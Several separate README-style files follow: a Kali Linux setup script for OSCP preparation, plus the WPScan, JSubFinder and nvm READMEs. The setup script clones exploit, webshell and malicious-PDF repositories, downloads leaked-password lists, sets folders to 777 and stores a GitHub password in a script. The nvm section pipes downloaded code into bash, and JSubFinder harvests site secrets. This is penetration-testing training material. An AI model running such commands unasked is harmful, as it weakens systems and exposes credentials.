and technical skills (available on [iOS](https://itunes.apple.com/nl/app/enki-coding-learn-to-code/id993753145) and [Android](https://play.google.com/store/apps/details?id=com.enki.insights)) * [Dcoder](https://dcoder.tech/): Next Gen Coding... (Available on [Android](https://play.google.com/store/apps/details?id=com.paprbit.dcoder) & [iOS](https://apps.apple.com/us/app/dcoder-code-compiler-ide/id1488496978)) * [Brilliant](https://brilliant.org/): Learn computer science with fun [iOS](https://apps.apple.com/us/app/brilliant-solve-learn-grow/id913335252) & [Android](https://play.google.com/store/apps/details?id=org.brilliant.android&hl=en_GB&gl=US) ### Collaboration tools * [Codeshare](http://codeshare.io/) * [JSFiddle](https://jsfiddle.net/) * [Kobra.io](https://kobra.io/) * [A web whiteboard](https://awwapp.com/) A touch-friendly online whiteboard (tableau) * [Glitch (GoMix)](https://glitch.com/) Build your applications online, with real collaboration * [Unity Teams](https://unity.com/products/unity-teams) It makes it simple to save, share and sync your Unity projects with anyone. * [Replit](https://replit.com/teams-for-education) Real-time code collaboration for educators and students. ### Podcasts * English * [Android Developers Backstage](https://feeds.feedburner.com/blogspot/AndroidDevelopersBackstage) Podcast interviewing Google engineers about the latest Android APIs * [Context Podcast](https://github.com/artem-zinnatullin/TheContext-Podcast) Podcast that discusses on various frameworks and tools available in Android Community * [From The Source](https://open.spotify.com/show/0OpoyHy2U3Ev9n9gpYD3Zr) From the Source is an interview show that answers the question of what tech jobs are really like, both the good and the boring. * [Tech Queens](https://anchor.fm/tech-queens) Stories and advice shared by women of color in tech * [Open source developer podcast](https://anchor.fm/opensourcedeveloperpod) Looking at open source including projects, community and people. * [BookBytes](https://www.orbit.fm/bookbytes) A book club for developers. * [Code Newbie](https://www.codenewbie.org/podcast)Stories from people on their coding journey. * [Ladybug Podcast](https://ladybug.dev/) An all lady-hosted tech podcast for all developers. * [Coding Blocks](https://www.codingblocks.net/) Podcast and Your Source to Learn How To Become a Better Programmer. * [Code Chefs](https://www.codechefs.dev/) Hungry Web Developer Podcast. * Portuguese * [Pizza de Dados](https://pizzadedados.com/) * [Hipster ponto Tech](https://hipsters.tech/) * [Braincast](https://www.b9.com.br/shows/braincast/) * [Devs Cansados](https://anchor.fm/devs-cansados) ### Learn Languages * [Duolingo](https://www.duolingo.com/): The world's best way to learn a language! * [Learn a Language](https://www.learnalanguage.com/): Learn a language with hundreds of free lessons
# Update Kali ``` sudo apt update sudo apt full-upgrade -y sudo apt install -y asciinema bloodhound bzip2 cherrytree curl dirsearch docker expect exploitdb flameshot ffuf gcc gifsicle git gobuster golang gzip imagemagick inkscape libsqlite3-dev libxslt-dev libxml2-dev nikto nishang openvpn p7zip-full perl python3 python3-pip realtek-rtl88xxau-dkms ssh unzip veil virtualbox wget zip zlib1g-dev sudo apt autoremove ``` # Update Nmap Scripts ``` sudo nmap --script-updatedb ``` # Install pip packages ``` pip3 install updog pip3 install wfuzz pip3 install ldap3 dnspython pip3 install ldapdomaindump ``` # install Veil 3 https://github.com/Veil-Framework/Veil ``` /usr/share/veil/config/setup.sh --force --silent ``` # change file/folder permissions ``` sudo chmod -R 777 /usr/share/wordlists sudo chmod -R 777 /opt ``` # Update $PATH ``` export PATH=$PATH:~/.local/lib export PATH=$PATH:/opt ``` # feroxbuster ``` wget https://github.com/epi052/feroxbuster/releases/latest/download/feroxbuster_amd64.deb.zip unzip feroxbuster_amd64.deb.zip sudo apt install ./feroxbuster_*_amd64.deb rm ./feroxbuster_*_amd64.deb rm ./feroxbuster_amd64.deb.zip ``` # Install pip for Python2: ``` curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py python get-pip.py ``` # install impacket ``` sudo docker build -t "impacket:latest" . ``` # install wpscan docker image ``` sudo docker pull wpscanteam/wpscan sudo docker run -it --rm wpscanteam/wpscan --update ``` # exploits: ``` cd /opt wget https://www.securitysift.com/download/linuxprivchecker.py git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git git clone https://github.com/PowerShellMafia/PowerSploit.git git clone https://github.com/SecWiki/windows-kernel-exploits.git git clone https://github.com/SecWiki/linux-kernel-exploits.git git clone https://github.com/tennc/webshell.git git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git git clone https://github.com/rsmudge/ZeroLogon-BOF.git git clone https://github.com/carlospolop/PEASS-ng.git git clone https://github.com/PowerShellMafia/PowerSCCM.git git clone https://github.com/411Hall/JAWS.git git clone https://github.com/frizb/Windows-Privilege-Escalation.git git clone https://github.com/itm4n/PrivescCheck.git git clone https://github.com/johnchakauya/wesng.git git clone https://github.com/leechristensen/SpoolSample.git git clone https://github.com/topotam/PetitPotam.git git clone https://github.com/antonioCoco/RemotePotato0.git git clone https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH.git git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/GossiTheDog/HiveNightmare.git git clone https://github.com/GossiTheDog/SystemNightmare.git git clone https://github.com/LOLBAS-Project/LOLBAS.git # my repo git clone https://github.com/ciwen3/OSCP.git # other git clone https://github.com/LOLBAS-Project/LOLBAS.git git clone https://github.com/mishmashclone/OlivierLaflamme-Cheatsheet-God.git git clone https://github.com/vjeantet/hugo-theme-docdock.git git clone https://github.com/NetSPI/PowerUpSQL.git # tools git clone https://github.com/sullo/nikto.git git clone https://github.com/phra/rustbuster.git git clone https://github.com/Tib3rius/AutoRecon.git git clone https://github.com/21y4d/nmapAutomator.git git clone https://github.com/ffuf/ffuf.git git clone https://github.com/sullo/nikto.git git clone https://github.com/cwinfosec/revshellgen.git git clone https://github.com/thosearetheguise/rev.git git clone https://github.com/mzet-/linux-exploit-suggester.git git clone https://github.com/HarmJ0y/PowerUp.git git clone https://github.com/BloodHoundAD/BloodHound git clone https://github.com/byt3bl33d3r/CrackMapExec.git git clone https://github.com/jonaslejon/malicious-pdf.git git clone https://github.com/tennc/webshell.git git clone https://github.com/dzonerzy/goWAPT.git cd goWAPT make sudo make install cd /opt git clone https://github.com/fox-it/mitm6.git cd mitm6/ pip3 install . sudo python3 ./setup.py install ``` # Wordlists ``` cd /usr/share/wordlists wget https://gist.githubusercontent.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7/raw/146f367110973250785ced348455dc5173842ee4/content_discovery_nullenc0de.txt wget https://gist.githubusercontent.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb/raw/a1db6730886a423c7639bb226beb331891bbb2a1/Workstation-Takeover.md wget https://crackstation.net/files/crackstation.txt.gz wget https://crackstation.net/files/crackstation-human-only.txt.gz wget http://downloads.skullsecurity.org/passwords/john.txt.bz2 wget http://downloads.skullsecurity.org/passwords/facebook-phished.txt.bz2 wget http://downloads.skullsecurity.org/passwords/porn-unknown.txt.bz2 wget http://downloads.skullsecurity.org/passwords/facebook-pastebay.txt.bz2 wget http://downloads.skullsecurity.org/passwords/elitehacker.txt.bz2 wget http://downloads.skullsecurity.org/passwords/hak5.txt.bz2 wget http://downloads.skullsecurity.org/passwords/hotmail.txt.bz2 wget http://downloads.skullsecurity.org/passwords/myspace.txt.bz2 wget http://downloads.skullsecurity.org/passwords/phpbb.txt.bz2 wget https://downloads.pwnedpasswords.com/passwords/pwned-passwords-sha1-ordered-by-count-v7.7z wget https://downloads.pwnedpasswords.com/passwords/pwned-passwords-ntlm-ordered-by-count-v7.7z wget http://www.petefinnigan.com/default/oracle_default_passwords.csv wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/default-passwords.csv wget https://raw.githubusercontent.com/drtychai/wordlists/master/fasttrack.txt wget https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/fasttrack/wordlist.txt gunzip ./*.gz bunzip2 ./*.bz2 7z x ./*.7z git clone https://github.com/danielmiessler/SecLists.git git clone https://github.com/drtychai/wordlists.git ``` # Create Asscinema ``` cd mkdir ~/asciinema ``` # Update zshrc and bashrc ``` sudo cat <<EOF >> /etc/zsh/zshrc HISTTIMEFORMAT='%F %T ' HISTFILESIZE=-1 HISTSIZE=-1 HISTCONTROL=ignoredups HISTIGNORE=?:?? EOF ``` ``` sudo cat <<EOF >> /etc/bash.bashrc HISTTIMEFORMAT='%F %T ' HISTFILESIZE=-1 HISTSIZE=-1 HISTCONTROL=ignoredups HISTIGNORE=?:?? EOF ``` # Ceate Sripts for Rtaining Data ``` cat <<EOF > ~/flameshot.sh #!/bin/bash while true; do flameshot full -p ~/Pictures/ ; sleep 60 ; done EOF chmod +x ~/flameshot.sh ``` ``` cat <<EOF > ~/OSCP-git.sh #!/bin/bash # upload all notes and screen shots to github every 5 min sleep 300 # Test file creation # touch 'new-'$(date +"%H:%M-%d-%b-%Y")'.txt' # Add, Commit and Upload files to Github git add -A git commit -m update git push origin main # for older Github accounts use below: # git push origin master EOF chmod +x ~/OSCP-git.sh ``` ``` cat <<EOF > ~/OSCP-expect.sh #!/usr/bin/expect -f set timeout -1 spawn ./OSCP-git.sh # Interact with the login using expect expect "Username for 'https://github.com':" send -- "<username>\n" expect "Password for 'https://<username>@github.com':" send -- "<password>\n" expect eof EOF chmod +x ~/OSCP-expect.sh ``` ``` sudo cat <<EOF >> ~/.zshrc echo "" echo "Checklist:" echo "==========" echo 'asciinema rec ~/asciinema/OSCP-\$(date +"%d-%b-%Y-%T").cast' echo "" echo "Auto upload github repo:" echo "while true; do ~/OSCP-expect.sh; done &" echo "" echo "Start screebshots:" echo "~/flameshot.sh &" echo "" echo "To Use Impacket Docker File Run:" echo 'sudo docker run -it --rm "impacket:latest"' echo "" echo "sudo docker run -it --rm wpscanteam/wpscan --url https://example.com/ --enumerate u" echo "" echo "to leave docker run exit" EOF ``` ``` sudo cat <<EOF >> ~/.bashrc echo "" echo "Checklist:" echo "==========" echo 'asciinema rec ~/asciinema/OSCP-\$(date +"%d-%b-%Y-%T").cast' echo "" echo "Auto upload github repo:" echo "while true; do ~/OSCP-expect.sh; done &" echo "" echo "Start screebshots:" echo "~/flameshot.sh &" echo "" echo "To Use Impacket Docker File Run:" echo 'sudo docker run -it --rm "impacket:latest"' echo "" echo "sudo docker run -it --rm wpscanteam/wpscan --url https://example.com/ --enumerate u" echo "" echo "to leave docker run exit" EOF ``` # MSFconsole setup ``` service postgresql start sudo msfdb init sudo chmod 777 /usr/share/metasploit-framework/.bundle/config ``` # Print Check List of things that need to be done manually ``` cat <<EOF Checklist: ========== CherryTree: Configuration: Edit > Preferences > Miscellaneous > Auto Save Every __ Minutes MSF setup: msfconsole db_status bundle install EOF ```
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/wpscan_logo_407x80.png "WPScan - WordPress Security Scanner") v3 BETA [![Gem Version](https://badge.fury.io/rb/wpscan.svg)](https://badge.fury.io/rb/wpscan) [![Build Status](https://travis-ci.org/wpscanteam/wpscan-v3.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan-v3) [![Code Climate](https://codeclimate.com/github/wpscanteam/wpscan-v3/badges/gpa.svg)](https://codeclimate.com/github/wpscanteam/wpscan-v3) [![Patreon Donate](https://img.shields.io/badge/patreon-donate-green.svg)](https://www.patreon.com/wpscan) # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2018 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers, an updated list of whom can be found within the CREDITS file. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - team@wpscan.org. We may grant commercial licenses at no monetary cost at our own discretion if the commercial usage is deemed by the WPScan Team to significantly benefit WPScan. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo. # INSTALL ## Prerequisites: - Ruby >= 2.2.2 - Recommended: 2.3.3 - Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault - RubyGems - Recommended: latest ### From RubyGems: ```gem install wpscan``` ### From sources: Prerequisites: Git ```git clone https://github.com/wpscanteam/wpscan-v3``` ```cd wpscan``` ```bundle install && rake install``` # Docker Pull the repo with ```docker pull wpscanteam/wpscan-v3``` # Usage ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): * ~/.wpscan/cli_options.json * ~/.wpscan/cli_options.yml * pwd/.wpscan/cli_options.json * pwd/.wpscan/cli_options.yml If those files exist, options from them will be loaded and overridden if found twice. e.g: ~/.wpscan/cli_options.yml: ``` proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/cli_options.yml: ``` proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` # PROJECT HOME [https://wpscan.org](https://wpscan.org) # VULNERABILITY DATABASE [https://wpvulndb.com](https://wpvulndb.com)
## ![jsubfinder logo](https://user-images.githubusercontent.com/17349277/146734055-8b836305-7a13-4c66-a02b-d92932322b42.png) JSubFinder is a tool writtin in golang to search webpages & javascript for hidden subdomains and secrets in the given URL. Developed with BugBounty hunters in mind JSubFinder takes advantage of Go's amazing performance allowing it to utilize large data sets & be easily chained with other tools. ![z69D8q](https://user-images.githubusercontent.com/17349277/147615346-9c1471a6-a9a8-45cb-a429-f789b255950c.gif) ## Install --- Install the application and download the signatures needed to find secrets Using GO: ```bash go install github.com/ThreatUnkown/jsubfinder@latest wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml ``` or [Downloads Page](https://github.com/hiddengearz/jsubfinder/tags) ## Basic Usage --- ### Search Search the given url's for subdomains and secrets ```text $ jsubfinder search -h Execute the command specified Usage: JSubFinder search [flags] Flags: -c, --crawl Enable crawling -g, --greedy Check all files for URL's not just Javascript -h, --help help for search -f, --inputFile string File containing domains -t, --threads int Ammount of threads to be used (default 5) -u, --url strings Url to check Global Flags: -d, --debug Enable debug mode. Logs are stored in log.info -K, --nossl Skip SSL cert verification (default true) -o, --outputFile string name/location to store the file -s, --secrets Check results for secrets e.g api keys --sig string Location of signatures for finding secrets -S, --silent Disable printing to the console ``` Examples (results are the same in this case): ```bash $ jsubfinder search -u www.google.com $ jsubfinder search -f file.txt $ echo www.google.com | jsubfinder search $ echo www.google.com | httpx --silent | jsubfinder search$ apis.google.com ogs.google.com store.google.com mail.google.com accounts.google.com www.google.com policies.google.com support.google.com adservice.google.com play.google.com ``` #### With Secrets Enabled *note `--secrets=""` will save the secret results in a secrets.txt file* ```bash $ echo www.youtube.com | jsubfinder search --secrets="" www.youtube.com youtubei.youtube.com payments.youtube.com 2Fwww.youtube.com 252Fwww.youtube.com m.youtube.com tv.youtube.com music.youtube.com creatoracademy.youtube.com artists.youtube.com Google Cloud API Key <redacted> found in content of https://www.youtube.com Google Cloud API Key <redacted> found in content of https://www.youtube.com Google Cloud API Key <redacted> found in content of https://www.youtube.com Google Cloud API Key <redacted> found in content of https://www.youtube.com Google Cloud API Key <redacted> found in content of https://www.youtube.com Google Cloud API Key <redacted> found in content of https://www.youtube.com ``` #### Advanced examples ```bash $ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g ``` * `-crawl` use the default crawler to crawl pages for other URL's to analyze * `-s` enables JSubFinder to search for secrets * `-S` Silence output to console * `-o <file>` save output to specified file * `-t 10` use 10 threads * `-g` search every URL for JS, even ones we don't think have any ### Proxy Enables the upstream HTTP proxy with TLS MITM sypport. This allows you to: 1) Browse sites in realtime and have JSubFinder search for subdomains and secrets real time. 2) If needed run jsubfinder on another server to offload the workload ```text $ JSubFinder proxy -h Execute the command specified Usage: JSubFinder proxy [flags] Flags: -h, --help help for proxy -p, --port int Port for the proxy to listen on (default 8444) --scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com -u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888") Global Flags: -d, --debug Enable debug mode. Logs are stored in log.info -K, --nossl Skip SSL cert verification (default true) -o, --outputFile string name/location to store the file -s, --secrets Check results for secrets e.g api keys --sig string Location of signatures for finding secrets -S, --silent Disable printing to the console ``` ```bash $ jsubfinder proxy Proxy started on :8444 Subdomain: out.reddit.com Subdomain: www.reddit.com Subdomain: 2Fwww.reddit.com Subdomain: alb.reddit.com Subdomain: about.reddit.com ``` #### With Burp Suite 1) Configure Burp Suite to forward traffic to an upstream proxy/ (User Options > Connections > Upsteam Proxy Servers > Add) 2) Run JSubFinder in proxy mode Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to burp and in another thread search for subdomains and secrets. #### With Proxify 1) Launch [Proxify](https://github.com/projectdiscovery/proxify) & dump traffic to a folder `proxify -output logs` 2) Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their [github page](https://github.com/projectdiscovery/proxify)) 3) Launch JSubFinder in proxy mode & set the upstream proxy as Proxify `jsubfinder proxy -u http://127.0.0.1:8443` 4) Use Proxify's replay utility to replay the dumped traffic to jsubfinder `replay -output logs -burp-addr http://127.0.0.1:8444` #### Run on another server Simple, run JSubFinder in proxy mode on another server e.g 192.168.1.2. Follow the proxy steps above but set your applications upstream proxy as 192.168.1.2:8443 #### Advanced Examples ```bash $ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt ``` * `--scope` limits JSubFinder to only analyze responses from www.reddit.com * `-p` port JSubFinders proxy server is running on * `-S` silence output to the console/stdout * `-o <file>` output examples to this file
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.6-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684) <!-- START doctoc generated TOC please keep comment here to allow auto update --> <!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE --> ## Table of Contents - [Installation](#installation) - [Install script](#install-script) - [Verify installation](#verify-installation) - [Important Notes](#important-notes) - [Git install](#git-install) - [Manual Install](#manual-install) - [Manual upgrade](#manual-upgrade) - [Usage](#usage) - [Long-term support](#long-term-support) - [Migrating global packages while installing](#migrating-global-packages-while-installing) - [Default global packages from file while installing](#default-global-packages-from-file-while-installing) - [io.js](#iojs) - [System version of node](#system-version-of-node) - [Listing versions](#listing-versions) - [.nvmrc](#nvmrc) - [Deeper Shell Integration](#deeper-shell-integration) - [zsh](#zsh) - [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file) - [License](#license) - [Running tests](#running-tests) - [Bash completion](#bash-completion) - [Usage](#usage-1) - [Compatibility Issues](#compatibility-issues) - [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux) - [Docker for development environment](#docker-for-development-environment) - [Problems](#problems) - [Mac OS "troubleshooting"](#mac-os-troubleshooting) <!-- END doctoc generated TOC please keep comment here to allow auto update --> ## Installation ### Install script To install or update nvm, you can use the [install script][2] using cURL: ```sh curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.6/install.sh | bash ``` or Wget: ```sh wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.33.6/install.sh | bash ``` <sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub> ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm ``` You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables. Eg: `curl ... | NVM_DIR=/usr/local/nvm bash` for a global install. <sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub> **Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type: ```sh command -v nvm ``` simply close your current terminal, open a new terminal, and try verifying again. **Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:- - your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again - you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry. If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code: `source ~/.bashrc` - For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576) ### Verify installation To verify that nvm has been installed, do: ```sh command -v nvm ``` which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary. ### Important Notes If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work. **Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us: - [nvm-windows](https://github.com/coreybutler/nvm-windows) - [nodist](https://github.com/marcelklehr/nodist) **Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us: - [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell - [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup - [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell - [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish **Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket: - [[#900] [Bug] nodejs on FreeBSD may need to be patched ](https://github.com/creationix/nvm/issues/900) - [nodejs/node#3716](https://github.com/nodejs/node/issues/3716) **Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that: - [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/) **Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that: - When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt` - If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm) - You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*` Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue. **Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade. **Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, so the minimum required git version is v1.7.0 and we recommend v1.7.9.5 as it's the default version of the widely used Ubuntu 12.04 LTS. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article. ### Git install If you have `git` installed (requires git v1.7+): 1. clone this repo in the root of your user profile - `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm` 2. `cd ~/.nvm` and check out the latest version with `git checkout v0.33.6` 3. activate nvm by sourcing it from your shell: `. nvm.sh` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion ``` ### Manual Install For a fully manual install, create a folder somewhere in your filesystem with the `nvm.sh` file inside it. I put mine in `~/.nvm` and added the following to the `nvm.sh` file. ```sh export NVM_DIR="$HOME/.nvm" && ( git clone https://github.com/creationix/nvm.git "$NVM_DIR" cd "$NVM_DIR" git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin` ) && . "$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm ``` ### Manual upgrade For manual upgrade with `git` (requires git v1.7+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin` ) && . "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 5.0 ``` In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in semver, versions communicate breakage, not stability). ### Long-term support Node has a [schedule](https://github.com/nodejs/LTS#lts_schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. ### Migrating global packages while installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages 